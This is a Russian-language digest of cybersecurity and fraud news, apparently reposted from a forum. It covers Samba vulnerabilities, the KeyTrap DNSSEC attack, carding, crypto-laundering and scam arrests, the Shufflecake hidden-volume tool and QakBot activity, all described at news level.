«Получение контроля над вредоносными веб-сайтами и перенаправление трафика с этих сайтов на защищенные серверы Microsoft поможет нам защитить существующих и будущих жертв, одновременно узнавая больше о деятельности Nickel», — написал Том Берт, вице-президент Microsoft по безопасности и доверию клиентов. Он отметил, что действия компании не помешают Nickel продолжить хакерские операции, но в Microsoft уверены, что удалили ключевую часть инфраструктуры, на которую группа полагалась для этой последней волны атак.
Помимо США, Nickel атаковала организации в Аргентине, Барбадосе, Боснии и Герцеговине, Бразилии, Болгарии, Чили, Колумбии, Хорватии, Чехии, Доминиканской Республике, Эквадоре, Сальвадоре, Франции, Гватемале, Гондурасе, Венгрии, Италии, Ямайке, Мали, Мексике, Черногории, Панаме, Перу, Португалии, Швейцарии, Тринидаде и Тобаго, Великобритании и Венесуэле.
Microsoft заявила, что ее подразделение по борьбе с цифровыми преступлениями заблокировало более 10 тысяч вредоносных веб-сайтов, используемых киберпреступниками, и почти 600 веб-сайтов, используемых государственными структурами. Ранее в этом году команда взяла под контроль вредоносные веб- домены, которые использовались в крупномасштабной кибератаке путем фишинга, нацеленной на жертв в 62 странах.
• Source: <https://blogs.microsoft.com/on-the-issues/2021/12/06/cyberattacks- nickel-dcu-china/>
[Опубликованы](https://lists.samba.org/archive/samba- announce/2021/000583.html) корректирующие выпуски пакета Samba 4.15.2, 4.14.10 и 4.13.14 с устранением 8 уязвимостей, большинство из которых могут привести к полной компрометации домена Active Directory. Примечательно, что одну из проблем исправляли с 2016 года, а пять - с 2020 года, тем не менее одно исправление привело к невозможности запустить winbindd при наличии настройки "allow trusted domains = no" (разработчики намерены оперативно опубликовать ещё одно обновление с исправлением). Выпуск обновлений пакетов в дистрибутивах можно проследить на страницах: Debian, Ubuntu, RHEL, SUSE, Fedora, Arch, FreeBSD.
Устранённые уязвимости:
CVE-2020-25717 - из-за недоработки логики маппинга пользователей домена с пользователями локальной системы, пользователь домена Active Directory, имеющий возможность создавать новые учётные записи на своей системе, управляемые через ms-DS- MachineAccountQuota, мог получить доступ с правами root на другие системы, входящие в домен.
CVE-2021-3738 - обращение к уже освобождённой области памяти (Use after free) в реализации RPC-сервера Samba AD DC (dsdb), которое потенциально может привести к повышению привилегий при манипуляции с установкой соединений.
CVE-2016-2124 - клиентские соединения, установленные с использованием протокола SMB1, могли быть переведены на передачу параметров аутентификации открытым текстом или через NTLM (например, для определения учётных данных при совершении MITM- атак), даже если для пользователя или приложения в настройках определена обязательная аутентификация через Kerberos.
CVE-2020-25722 - в контроллере домена Active Directory на базе Samba не выполнялись должные проверки доступа к хранимым данным, что позволяло любому пользователю обойти проверки полномочий и полностью скомпрометировать домен.
CVE-2020-25718 - в контроллере домена Active Directory на базе Samba не корректно изолировались ticket-ы Kerberos, выданные RODC (Read-only domain controller), что могло использоваться для получения у RODC тикетов администратора, не имея на это полномочий.
CVE-2020-25719 - контроллер домена Active Directory на базе Samba не всегда учитывал в связке поля SID и PAC в ticket-ах Kerberos (при настройке "gensec:require_pac = true" проверялось только имя, а PAC не учитывался), что позволяло пользователю, имеющему право создавать учётные записи на локальной системе, выдать себя за другого пользователя в домене, в том числе привилегированного.
CVE-2020-25721 - для пользователей, прошедших аутентификацию с использованием Kerberos, выдавались не всегда уникальные идентификаторы для Active Directory (objectSid), что могло привести к пересечениям одного пользователя с другим.
CVE-2021-23192 - при проведении MITM-атаки имелась возможность подмены фрагментов в больших запросах DCE/RPC, разбиваемых на несколько частей.
Как [сообщает](https://www.elsalvador.com/noticias/nacional/chivo-wallet- denuncias-robo-de-identidad/887907/2021/) издание ElSalvador, от нескольких десятков людей поступили жалобы, что их документы, удостоверяющие личность, были использованы для установки кошелька Chivo без их ведома. Предполагается, что мошенники пытаются заполучить $30 в BTC, которые власти Сальвадора раздают всем гражданам, впервые зарегистрировавшим кошелек.
Пользователи опасаются, что если злоумышленникам удалось украсть их личные данные, то они смогут использовать эту информацию для совершения преступлений и отмывания денег. Экономист Татиана Маррокин (Tatiana Marroquín) рассказала, что решила проверить, использовались ли ее данные для установки Chivo.
«Я не регистрировалась в Chivo и не скачивала приложение на мобильный телефон. Но когда я попыталась это сделать, выяснилось, что моя учетная запись уже активна. Как я могу быть уверена в том, что средства в этом кошельке находятся в безопасности и не используются в незаконных целях, если кто-то может подделать мои данные? Как нам защититься от возможных последствий, если наши данные уже были использованы для получения денег от государства?», – заявила Маррокин.
Местные организации по защите гражданских прав рекомендуют людям, чья личная информация использовалась без их согласия для регистрации кошелька, подать жалобу в Генеральную прокуратуру Республики Сальвадор, а также обратиться в техническую поддержку Chivo. Если пострадавшие пользователи не получат своевременного ответа от техподдержки, они должны обратиться в Управление по защите прав потребителей.
Напомним, что после легализации биткоина в Сальвадоре и запуска кошелька Chivo, граждане страны жаловались на проблемы с регистрацией. Однако уже в конце сентября президент Найиб Букеле (Nayib Bukele) сообщил, что приложение Chivo используют уже более 2.1 млн человек.
.
28 октября 2021 года Марк Цукерберг
объявил о
переименовании Facebook в Meta. Вместо социальной сети
грядет метавселенная — глобальная платформа виртуальной реальности, где все
пользователи будут общаться друг с другом без необходимости нахождения в
определенном физическом пространстве и привязки к разработанным для соцсети
особым гаджетам.
Причина переименования — название Facebook уже не вмещает все то, что
представляет собой компания и опыт ее пользователей.
Вместе с появлением метавселенной соцсеть Facebook и Messenger перестанет играть ключевую роль для компании и встанет в один ряд с другими проектами корпорации, как мессенджер WhatsApp, соцсеть Instagram, устройства виртуальной реальности Oculus, платформа виртуальной реальность Horizon и многие другие проекты.
Цукерберг уточнил, что это не ребрендинг соцсети, а перерождение в новую платформу, которая будет еще более погружающей для пользователей и воплотит в цифровую реальность новую главу интернета, где ощущение присутствия будет максимально приближено к реальности как с помощью голограмм, так и повсеместному использованию устройств дополненной и виртуальной реальности. По его мнению в ближайшие 10 лет у метавселеной (metaverse) будет не менее миллиарда пользователей, а новая экосистема для ее расширения создаст уже через пару лет миллионы рабочих мест — как для разработчиков программных продуктов и сервисов, так и для авторов контента.
Цукерберг раскрыл, что название Meta происходит от греческого слова «после» («за пределами»), и для него оно символизирует тот факт, что всегда можно построить что-то еще перейти в следующую главу истории.
Названия приложений и сервисов Facebook, Instagram, Messenger и WhatsApp не будет переименовываться и останутся прежними. Также на первом этапе новой жизни компании в ней не будет делаться изменений в корпоративной структуре.
Цукерберг показал мир метавселенной Meta, в которой мы будем скоро жить.
Крупнейшая социальная сеть в мире и ее материнская компания Facebook Inc. была основана 4 февраля 2004 года Марком Цукербергом и его соседями по комнате, когда они учились в Гарвардском университете. Соцсеть стала доступна всему миру с сентября 2006 года.
Мировая выручка Facebook за 2020 год составила почти $86 млрд, а чистая прибыль $29 млрд.
На фоне новостей об переименовании акции Facebook выросли на 3,5%. По данным на 22:30 мск, стоимость акции компании на NASDAQ [поднялась](https://finance.yahoo.com/quote/FB?p=FB&.tsrc=fin- srch&guccounter=1) до $324.
Сотрудники EFCC остановили работу крупного мошеннического колл-центра в Лагосе и задержали 792 подозреваемых. Об этом [сообщают местные СМИ](https://www.thecable.ng/breaking-efcc-nabs-792-crypto-fraudsters-in- lagos-biggest-arrest-in-a-day/).
В числе задержанных 158 иностранцев, включая граждан Китая, Филиппин и Казахстана.
По данным властей, зарубежные кураторы нанимали нигерийцев для совершения инвестиционных и романтических мошенничеств. Они заманивали жертв из Европы, Северной и Южной Америки на поддельную инвестиционную платформу Yooto. Плата за активацию аккаунта на ней составляла от $35.
Переписка велась через WhatsApp, Instagram и Telegram.
Правоохранители изъяли более 500 SIM-карт, компьютеры, мобильные телефоны и транспортные средства.
До момента судебного заседания подозреваемые заключены под стражу. Другие подробности и личности организаторов схемы не раскрываются.
На сервере DNS, выполняющем валидацию по DNSSEC, можно вызвать состояние отказа в обслуживании (DoS) с помощью вредоносного пакета. Германские ученые разработали PoC-атаку, позволяющую подвесить резолвер и закрыть клиентам доступ к сайтам на 16 часов.
Угроза, нареченная KeyTrap, актуальна также для публичных DNS-сервисов вроде тех, что предоставляют Google и Cloudflare, и была зарегистрирована как уязвимость под идентификатором CVE-2023-50387 (7,5 балла CVSS).
Все началось с того, что специалисты исследовательского центра Дармштадта, занимающегося прикладными аспектами ИБ, обнаружили в спецификациях DNSSEC от 1999 года (RFC 2535) изъян, перекочевавший в более поздние версии в виде требований по реализации защитного протокола. Там сказано:
«Сервер имен должен отдавать все наличные криптографические материалы, а резолвер — использовать все, что прислано, пока проверка соответствия не окончится успехом».
Отсюда можно сделать вывод, что резолвер, использующий DNSSEC, можно спровоцировать на контакт с сервером, отдающим вредоносный ответ — набор ресурсных записей (RR), валидация которых создает перегрузки по CPU. Таким образом, злоумышленник сможет временно вывести резолвер из строя; тесты показали, что период отказа может составлять от трех минут до 16 часов — зависит от софта, используемого мишенью.
В итоге пострадают не только пользователи, потерявшие доступ к веб-контенту, но также такие сервисы, как защита от спама, PKI, обеспечение безопасности маршрутизации (RPKI). По данным исследователей, в настоящее время DNSSEC- резолвинг используют 31% веб-клиентов в интернете, и атака KeyTrap может обернуться для них большой проблемой (обитатели рунета теперь знают об этом не понаслышке).
Все затронутые вендоры профильного софта и операторы популярных публичных DNS- сервисов уже поставлены в известность и пытаются смягчить ситуацию с помощью [патчей](https://doc.powerdns.com/recursor/security-advisories/powerdns- advisory-2024-01.html), однако они могут лишь поддержать работоспособность резолверов при полной загрузке CPU. Полное устранение выявленной уязвимости, по мнению исследователей, потребует пересмотра стандарта DNSSEC.
В Таиланде накрыли группу из трех человек, которые входили в более крупное сообщество местных кардеров. Они специализировались на краже денег у туристов, а помогали в этом владельцы POS-терминалов.
Местные жители со сложночитаемыми и сложновыговариваемыми именами попали в поле зрения полиции после задержания банды карманников. У троицы кардеров нашли четыре терминала для пластика, 30 квитанций по совершенным операциям, три мобильных телефона, используемых для связи с карманниками, а также метамфетамин. В отличие от карманников, все кардеры оказались гражданами Таиланда.
Следователи установили, что кредитные карты, украденные у туристов возле одной из достопримечательностей Бангкока, были переданы подозреваемым. Те вступили в сговор с предприятиями, владеющими POS-терминалами, чтобы провести через них фейковые покупки и обналичить средства. Комиссия хозяев устройств составляла 25-30 процентов. Злоумышленники оставляли себе и карманникам лишь 5-10 процентов украденного, отправляя все остальное разработчику схемы из Китая.
Суммарный ущерб, нанесенный группировкой, может составлять около 3 миллионов бат (порядка 7,5 миллиона рублей), «заработанных» в результате 20 транзакций.
sc: khaosodenglish.com/news/crimecourtscalamity/2024/01/20/credit-card-fraud- ring-busted-3-arrested
Жителя Тайваня по фамилии Цю и троих его подельников обвинили в организации крупнейшей для страны схемы по отмыванию средств в криптовалюте. Об этом сообщают местные СМИ.
По версии следствия, несколько преступных групп из Гонконга, Филиппин и Малайзии занимались убийствами, а также мошенничеством и кражей средств через брокерское приложение Taishin Securities.
Цю предположительно помогал им и другим злоумышленникам, включая нелегальные казино, переводить средства в криптовалюты. За свои услуги он получал процент от каждой операции.
Установлено, что с середины февраля 2022 года кошелек фигуранта обработал транзакции на сумму 320 млн USDT, конвертированная рыночная стоимость которых составила более 10,4 млрд тайваньских долларов. Дополнительно полиция отследила переводы 2,1 млн USDT (около 70 млн тайваньских долларов).
Цю задержали в аэропорту в июне 2023 года. При обыске у него изъяли автомобили Lamborghini Urus и Lexus LM, а также трое часов Audemars Piguet, 210 000 тайваньских долларов наличными, ноутбуки, телефоны, дебетовые карты, сберкнижки и наркотики.
Дело передано в прокуратуру. Цю находится под стражей с возможностью внесения залога в размере 100 000 тайваньских долларов. В отношении его подельников также избраны различные меры пресечения.
source: udn.com/news/story/7315/7541063
Киберпреступники похитили 1580 биткоинов и раскидали их по 6 разным криптокошелькам.
Американское Федеральное бюро расследований (ФБР) предупредило в минувший вторник, что хакеры, связанные с Северной Кореей, могут попытаться обналичить похищенную криптовалюту на сумму более 40 миллионов долларов. Правоохранительные органы США связывают эту кибердеятельность с группировкой, известной как «TraderTraitor», также использующей имя «Jade Sleet». Расследование ФБР показало, что в период с 21 по 22 августа группа перевела около 1580 биткоинов, похищенных в результате нескольких криптовалютных хакерских атак. В настоящее время эти средства находятся в шести разных криптокошельках.
Известно, что Северная Корея стирает грани между кибервойной, шпионажем и финансовыми преступлениями. Группировка TraderTraitor, в частности, связана с рядом атак на блокчейн-биржи и криптовалютные обменники с целью хищения цифровых активов для получения незаконных доходов этой страной, находящейся под санкциями. В их числе кража криптовалюты на 60 миллионов долларов у Alphapo 22 июня 2023 года, хищение 37 миллионов долларов у CoinsPaid 22 июня 2023 года и кража 100 миллионов долларов у Atomic Wallet 2 июня 2023 года, а также атаки на сеть Ronin Sky Mavis и Harmony Bridge в прошлом году. Группировка пересекается с другой северокорейской хакерской группой APT38 (также известной как BlueNoroff или Stardust Chollima), которая, в свою очередь, является частью более крупной группы Lazarus.
По данным компании TRM Labs, с 2018 года северокорейские хакеры похитили криптовалюты на сумму более 2 миллиардов долларов в результате 30 атак, причём только в 2023 году было украдено около 200 миллионов долларов. ФБР призывает частные компании проанализировать блокчейн-данные, связанные с этими адресами, и быть бдительными в отношении транзакций, напрямую или косвенно связанных с этими адресами.
Житель Калифорнии признал себя виновным в краже и отмывании денег на сумму до $1,5 млн. Жертвам он представлялся владельцем успешного бизнеса и биткоин- инвестором, говорится в пресс-релизе Минюста США.
35-летний Зе’Шон Стенли Кэмпбелл согласился с одним пунктом обвинения, связанным с мошенничеством с использованием электронных средств.
Согласно его признанию, с 2014 по 2020 год Кэмпбелл вступал в дружеские и даже романтические отношения с жертвами, убеждая в своей надежности. Для повышения кредитоспособности он утверждал, что владеет «миллионами долларов».
Он ложно сообщал, что владеет успешным бизнесом, включая франшизу McDonald’s, охранную фирму и сеть спортивных клубов в Техасе. Кэмпбелл представлялся жертвам успешным инвестором в недвижимость и биткоин. Злоумышленник также сообщал, что служил в «морских котиках» и участвовал в войнах в Ираке и Афганистане.
Заверив жертвы в своей добросовестности, он убеждал предоставить ему средства на якобы поддержку своего бизнеса и инвестиции, в том числе в первую криптовалюту.
На самом деле полученные деньги Кэмпбелл использовал на покупку предметов роскоши для себя.
Например, в декабре 2017 года он получил от одного из потерпевших $61 452, пообещав вложить их в цифровое золото. Однако потратил всю сумму на собственное потребление, оплатив в том числе покупку автомобилей BMW и Mercedes-Benz. Машины он оформил в лизинг на имя другой жертвы.
В конечном итоге аферист обманул десять физических лиц и девять компаний. По его признанию, совокупный ущерб составил от $250 000 до $1,5 млн.
Слушания по вынесению приговора назначены на 9 января 2023 года. Ему грозит до 30 лет лишения свободы.
source: justice[.]gov/usao-cdca/pr/romance-scammer-pleads-guilty-federal- charges-admitting-he-stole-hundreds-thousands
Эксперты из компании ReasonLabs обнаружили необычную вредоносную схему, работающую с 2019 года. По мнению исследователей, с ее помощью хакеры похитили миллионы долларов у десятков тысяч жертв. Оказалось, что злоумышленники управляют большой сетью, состоящей более чем из 200 фальшивых сайтов знакомств и поддержки клиентов, и используют эти ресурсы для списания средств с чужих банковских карт, купленных в даркнете.
[](https://xakep.ru/wp- content/uploads/2022/09/402673/Group-2769.994c397a.jpg)
В рамках этой кампании используются два вида доменов: сайты знакомств и порталы поддержки клиентов (списки адресов можно найти в отчете компании). Если попытаться зайти на сайты компаний, которым якобы принадлежат эти фейковые ресурсы, можно обнаружить, что их не существует вовсе, или они используют несуществующие адреса электронной почты, вроде mail@example.com.
[](https://xakep.ru/wp-
content/uploads/2022/09/402673/dating-sites.jpg)Фейковые сайты знакомств
При этом сами сайты знакомств и поддержки клиентов выглядят рабочими, но не
получают практически никакого трафика, занимая низкие позиции в результатах
поиска Google. Дело в том, что они существуют не для привлечения
пользователей, а чтобы служить каналами для отмывания денег.
[](https://xakep.ru/wp- content/uploads/2022/09/402673/traffic-analysis.jpg)
Аналитики ReasonLabs пишут, что все сайты имеют одинаковую HTML-структуру и почти одинаковый контент, поэтому похоже, что они созданы с помощью автоматических инструментов. При этом фальшивые порталы поддержки клиентов часто используют имена несуществующих организаций, либо стараются напоминать настоящие бренды, такие как McAfee, ReasonLabs и другие фирмы.
[](https://xakep.ru/wp- content/uploads/2022/09/402673/customer-support.jpg)
Также отмечается, что операторы этой кампании, похоже, приложили немало усилий, чтобы скрыть все 75 фальшивых порталов поддержки от индексации поисковыми системами, используя инструкции для защиты от сканеров в Robots.txt.
Но самой большой сложностью для злоумышленников является регистрация этих сайтов у операторов платежей, которые обычно классифицируют их как «высокорисковые» (даже если речь идет о легитимном ресурсе) из-за высокого процента возвратных платежей. Чтобы не попасть в черный список, каждый сайт подает заявку индивидуально, так как операторы кампании опасаются потерять все ресурсы сразу в случае выявления мошенничества.
Если ресурсам нужно доказать свою легитимность, то на всех сайтах имеется круглосуточный чат с поддержкой и работающий телефон, переданный на аутсорсинг в настоящий колл-центр. Кроме того, на всех сайтах указан бесплатный номер на тот случай, если пользователи захотят отменить платеж, чего мошенники обычно не предлагают.
Как только оператор платежей одобрил запрос, хакеры пускают в дело миллионы украденных платежных карт, купленных в даркнете, и списывают с них деньги через свои фальшивые сайты. Большинство карт принадлежат жителям США, но также сообщается, что хакеры покупали карты и из франкоязычных стран.
Снятие средств осуществляется либо с помощью API, либо вручную. При этом операторы сайтов очень осторожны и стараются не привлекать к себе внимания. Они снимают небольшие суммы, используют распространенные названия, которые могут затеряться среди других расходов жертвы, задействуют повторяющиеся платежи с одной и той же суммой и избегают тестовых транзакций.
[](https://xakep.ru/wp-
content/uploads/2022/09/402673/image.jpg)Платежная страница на одном из сайтов
мошенников
Более того, в некоторых случаях хакеры даже возвращают жертвам деньги,
благодаря чему их операции становятся более аутентичными, а charge-back
коэффициент кажется низким.
Хотя пока многие из 275 фиктивных сайтов по-прежнему работают, эксперты ReasonLabs уже уведомили о своих выводах представителей платежных систем и правоохранительные органы.
«Мы сообщили об этой афере более чем дюжине сторон, которых она так или иначе касалась. В их число входят Visa и Mastercard, а также множество других сервисов, включая AWS, GoDaddy и всевозможных регистраторов. Также мы уведомили о мошенничестве Fraud.org, проект некоммерческой правозащитной организации “Национальная лига потребителей”, которая делится жалобами потребителей с сетью более чем из 200 партнеров в правоохранительных органах», — заявляют специалисты.
Click to expand...
source: reasonlabs.com/research/credit-card-scam-report
В общем он смог обманом заработать почти миллион долларов.
Он ввозил в США поддельные iPhone с настоящими серийниками и IMEI, после чего обращался в сервисные центры Apple с заявлением, что телефон сломаны, и по гарантийным обязательствам Apple обязана заменить смартфон, если он не подлежит ремонту.
У него было несколько сообщников, в том числе его жена.
Также у него были поддельные документы и несколько поддельных почтовых ящиков, что бы спокойно и по несколько раз обращаться в сервисные центры.
Схема была раскрыта лишь в 2019 году, и постановлением американского суда от 1 февраля 2022 года, он был приговорен к 26 месяцам заключения, однако он отбыл этот срок в ожидании суда.
Теперь ВУ обязан выплатить компании компенсацию в 980 000$, и такой же штраф государству, его жена получила 5 месяцев заключения, а также у пары конфисковали недвижимость, приобретённую на полученные незаконным образом деньги.
Следователем следственной части СУ УМВД России по Курганской области завершено расследование уголовного дела в отношении 25-летнего жителя города Оренбурга, обвиняемого в краже с банковского счета и мошенничествах, совершенных через социальные сети.
Противоправная деятельность жителя Оренбурга была пресечена сотрудниками уголовного розыска УМВД России по Курганской области летом 2020 года.
В ходе следствия установлено, что ранее судимый за аналогичные преступления молодой человек покупал на нелегальном сайте логины и пароли от страниц пользователей одной из популярных социальных сетей, которые в последующем взламывал. После чего, сразу менял пароль, тщательно изучал переписки, стиль общения хозяев учетных записей и вводил в заблуждение собеседников. Со взломанных страниц он рассылал друзьям владельцев учетных записей сообщения с просьбами о переводе денежных средств. Доверчивые граждане, думая, что помогают близким оплатить покупку в Интернет-магазине, переводили деньги мошеннику, а когда обман вскрывался, обращались в полицию. Таким образом фигуранту удалось похитить более 350 тысяч рублей у жителей Оренбургской, Свердловской, Псковской, Курганской областей и Республики Татарстан.
На одну из потерпевших злоумышленник незаконно оформил кредит, попросив воспользоваться ее счетом от лица родственницы. Таким образом, женщина лишилась около 300 тысяч рублей, большая часть из которых взята в кредит.
В настоящее время уголовное дело по обвинению жителя Оренбурга в совершении преступлений, предусмотренных ч. 2 ст. 272, ч. 1 ст. 159, ч. 2 ст. 159, ч. 3 ст. 159, п. «г» ч. 3 ст. 158 Уголовного кодекса Российской Федерации, направлено в суд для рассмотрения по существу.
В дежурную часть ОМВД России по Апшеронскому району с сообщением о мошенничестве обратилась местная жительница. Заявительница пояснила, что ей позвонил неизвестный мужчина, представился сотрудником финансового учреждения и сообщил о подозрительных операциях по ее банковскому счету. Чтобы сохранить свои сбережения потерпевшая перевела деньги на указанный злоумышленником счет, а позже связалась с банком. Общая сумма ущерба составила более 1,3 млн рублей.
В результате проведения оперативно-розыскных мероприятий сотрудники группы по противодействию преступлениям, совершенным с использованием информационно- телекоммуникационных технологий ОУР, установили причастность к совершению данного противоправного деяния 18-летнего жителя города Новосибирска. Находясь в служебной командировке, оперативники задержали подозреваемого в городе Новосибирске по месту жительства.
В настоящее время в отношении молодого человека возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Санкции указанной части статьи предусматривают максимальное наказание в виде лишения свободы на срок до десяти лет. На период предварительного следствия злоумышленнику избрана мера пресечения в виде заключения под стражу.
Летом 2019 года сотрудниками Управления уголовного розыска МВД по Чувашской Республике вместе с коллегами из Главного управления уголовного розыска МВД России, оперативниками из Волгоградской и Саратовской областей при участии Росгвардии была проведена крупномасштабная операция в ряде регионов страны, в результате которой были задержаны участники организованного преступного сообщества. Злоумышленники совершали мошенничества под предлогом продажи автозапчастей через Интернет. Потерпевшие перечисляли им предоплату или полную стоимость за товар, но взамен ничего не получали.
Следствием МВД по Чувашской Республике было установлено, что организатором и руководителем преступного сообщества являлся ранее судимый уроженец одной из стран ближнего зарубежья, который вовлек в криминальную деятельность 7 человек. Большинство из них не имели регистрации на территории России.
В ходе расследования уголовного дела, объем материалов которого составил более 50 томов, следователем совместно с оперативниками удалось доказать причастность участников сообщества к 56 эпизодам преступлений. Установлено, что злоумышленники действовали в составе организованного преступного сообщества, у них имелась четкая иерархия, распределение ролей, меры строгой конспирации.
Потерпевшими по делу признаны 49 человек, проживающих на территории Московской и Волгоградской областей, Чувашской Республики и других регионов России. В настоящее время принимаются меры по возмещению им материального ущерба.
Приговором Подольского городского суда Московской области участникам преступного сообщества назначено наказание в виде лишения свободы сроком от 9 до 15 лет. Приговор не вступил в законную силу.
• Video:
Компания Kudelski Security, специализирующаяся на проведении аудита
безопасности,
[опубликовала](https://research.kudelskisecurity.com/2022/11/10/introducing-
shufflecake-plausible-deniability-for-multiple-hidden-filesystems-on-linux/)
инструментарий Shufflecake, который позволяет
создавать на диске скрытые файловые системы, размазанные по имеющемуся
свободному пространству в существующих разделах и не отличимые от случайных
остаточных данных. Разделы создаются таким образом, что не зная ключ доступа
существование их проблематично доказать даже при проведении
криминалистического анализа. Код утилит (shufflecake-
userland) и модуля
ядра Linux (dm-sflc) написан на
языке Си и распространяется под лицензией
GPLv3, что делает невозможным включение опубликованного модуля ядра в основной
состав ядра Linux из-за несовместимости с лицензией GPLv2, под которой
поставляется ядро.
Проект позиционируется как более совершенное, чем Truecrypt и Veracrypt,
решение для скрытия требующих защиты данных, которое имеет родную поддержку
платформы Linux и позволяет размещать до 15 скрытых разделов на устройстве,
вложенных друг в друга для запутывания разбора их существования. Если само
применение Shufflecake не представляет тайну, о чем можно судить, например, по
наличию в системе соответствующих утилит, то общее число созданных скрытых
разделов определить невозможно. Создаваемые скрытые разделы на усмотрение
пользователя могут форматироваться для размещения любых ФС, например, ext4,
xfs или btrfs. Каждый раздел обрабатывается как отдельное виртуальное блочное
устройство со своим ключом разблокировки.
Для запутывания следов предлагается использовать модель поведения
"правдоподобное
отрицание"
(plausible deniability), суть которого в том, что представляющие ценность
данные скрываются в качестве дополнительных слоёв в шифрованных разделах с
менее ценными данными, образуя своеобразную скрытую иерархию разделов. В
случае давления владелец устройства может раскрыть ключ к шифрованному
разделу, но в этом разделе могут скрываться другие разделы (вплоть до 15
вложенных уровней), а определить их наличие и доказать существование
проблематично.
Скрытие обеспечивается благодаря
формированию каждого раздела как набора шифрованных слайсов, размещаемых в
случайных позициях на устройстве хранения. Каждый слайс создаётся динамически
в момент когда в разделе требуется дополнительное пространство для хранения.
Для затруднения анализа слайсы разных разделов чередуются, т.е. разделы
Shufflecake не связываются с непрерывными областями и слайсы всех разделов
смешиваются. Информация об используемых и свободных слайсах хранится в
привязанной к каждому разделу карте местоположения, на которую ссылается
зашифрованный заголовок. Карты и заголовок зашифрованы и без знания ключа
доступа неотличимы от случайных данных.
Заголовок разделён на слоты, каждый из которых определяет свой раздел и
связанные с ним слайсы. Слоты в заголовке размещены в стековом порядке и
рекурсивно связаны - текущий слот содержит ключ для расшифровки параметров
предыдущего раздела в иерархии (менее скрытого), что позволяет использовать
один пароль для расшифровки всех менее скрытых разделов, связанных с выбранным
разделом. Каждый менее скрытый раздел рассматривает слайсы вложенных разделов
как свободные.
По умолчанию все вложенные разделы Shufflecake имеют тот же видимый размер,
что и раздел верхнего уровня. Например, если на устройстве, размером 1 ГБ
задействовано три раздела, каждый из них будет виден для системы как раздел с
размером 1 ГБ и общее доступное дисковое пространство будет совместно
использоваться во всех разделах - если в сумме размер сохранённых данных
превысит фактический размер устройства, начнёт выдаваться ошибка ввода/вывода.
Не открытые вложенные разделы не участвуют в распределении места, т.е. попытка
заполнения раздела верхнего уровня приведёт к перетиранию данных во вложенных
разделах, но не даст возможность раскрыть их наличие через анализ размера
данных, который удастся разместить в разделе до начала вывода ошибки
(предполагается, что верхние разделы содержат неизменяемые данные для
отвлечения внимания и никогда по отдельности не используются, а штатная работа
осуществляется всегда с самым последним вложенным разделом).
Фактически всегда создаётся 15 разделов Shufflecake - к используемым разделам
привязывается пароль пользователя, а неиспользованные разделы снабжаются
случайно сгенерированным паролем (невозможно понять сколько реально разделов
используется). При инициализации разделов Shufflecake, выделенные для их
размещения диск, раздел или виртуальное блочное устройство заполняется
случайными данными, что не позволяет выделить на общем фоне метаданные и
данные Shufflecake.
Реализация Shufflecake имеет достаточно высокую производительность, но из-за
наличия накладных расходов примерно в два раза отстаёт по пропускной
способности по сравнению с шифрованием дисков на базе подсистемы LUKS.
Применение Shufflecake также приводит к дополнительным затратам оперативной
памяти и места для хранения служебных данных на диске. Затраты памяти
оценивается в 60 МБ на каждый раздел, а места на диске - в 1% от общего
размера. Для сравнение, аналогичная по назначению техника
WORAM приводит к
замедлению от 5 до 200 раз с 75% потерей полезного места на диске.
Инструментарий и модуль ядра протестированы только при работе в Debian и
Ubuntu с ядрами 5.13 и 5.15 (поддерживается работа в Ubuntu 22.04).
Отмечается, что проект пока стоит рассматривать как рабочий прототип, который
не стоит использовать для хранения важных данных. В будущем планируется
провести дополнительную оптимизацию производительности, надёжности и
безопасности, а также обеспечить возможность загрузки с разделов Shufflecake.
шифрованных разделов на диске ](https://www.opennet.ru/opennews/art.shtml?num=58105)
www.opennet.ru
Житель города Днепр выступил соучастником мошеннической схемы, которая заключалась в создании фейковых интернет-магазинов мобильной техники. Всего таких магазинов оказалось 23. Вначале, чтобы заработать репутацию и отзывы, организаторы действительно отправляли покупателям технику. Однако в какой-то момент, по команде организатора, они перестали рассылать заказы.
Мошеннические сайты специализировались на продаже мобильных телефонов и выглядели так, что не вызывали у посетителей никаких подозрений относительно их честности. Вся, представленная на них информация относительно товаров и условий работы магазина, выглядела очень убедительно.
Организаторы схемы провели целый комплекс работ по SEO-оптимизации магазинов, в результате чего они смогли попадать на первые позиции выдачи в поисковиках по запросу популярных моделей смартфонов. Также мошенники добавили свои магазины в автоматические системы сравнения цен, где посетители могли видеть их цены, значительно более низкие, чем у конкурентов.
Для каждого из магазинов мошенники приобрели отдельную sim-карту. Получив заказ через сайт, менеджер связывался с покупателями по одному из этих телефонов и предлагал выслать счет-фактуру на оплату товара. Клиенты получали реквизиты для оплаты по электронной почте или в смс-сообщениях, переводили деньги и ждали, когда магазин доставит их заказ, однако никакого заказа они не получали.
Чтобы отсрочить момент, когда обманутые клиенты побегут жаловаться в полицию, мошенники объясняли каждому, что выполняют отправку заказов со склада только раз в неделю.
Этого времени им хватало, чтобы собрать очередную партию жертв, после чего они закрывали скомпрометированный магазин и выбрасывали закрепленную за ним SIM- карту. Всего в материалах уголовного дела упоминаются около 80-ти потерпевших, ставших клиентами 23-х фейковых магазинов.
В целях конспирации, преступники настроили для номеров, которые использовались в преступной схеме, переадресацию входящих вызовов на другие телефоны, которые физически находились в различных городах Украины. Это сильно затруднило задачу следствия по розыску подозреваемых.
Чтобы не раскрывать свои личности в процессе приема платежей, злоумышленники придумали способ, как завладеть банковскими картами граждан, которые остро нуждались в деньгах. Компаньоны подыскивали таких кандидатов из числа парковщиков и уличных распространителей рекламы.
Под видом сотрудников налоговой милиции и судебных исполнителей, они просили передать им карты за вознаграждение 1,000 гривен, уверяя, что ни в каких сомнительных операциях карта принимать участия не будет. Завладев картой, они меняли через банкомат PIN-код и финансовый номер телефона.
Полученные от клиентов фейковых интернет-магазинов деньги, преступники обналичивали через банкоматы Днепра и области. А чтобы сделать невозможным установление их личностей через камеры видеонаблюдения банкоматов, сообщники прятали лица под масками.
Представший перед судом менеджер интернет-магазинов был обвинен по ч. 3 ст. 190 (мошенничество, совершенное в крупных размерах или совершенное при помощи компьютерной техники). Судья определил ему наказание в виде 5 лет лишения свободы, с испытательным сроком 2 года. На момент вынесения приговора, следствию так и не удалось установить личности сообщников преступления.
Новая версия банковского трояна QakBot атакует тысячи пользователей, большая часть которых находится в России. Аналитики «Лаборатории Касперского» утверждают, что в 2021 году число атакованных граждан выросло на 65% в сравнении с прошлым годом.
По всему миру в общей сложности QakBot поразил более 17 тысяч юзеров. Из них 10 500 проживают на территории России. Впервые этот вредонос попался экспертам в 2007 году, однако в последние годы его авторы существенно доработали троян.
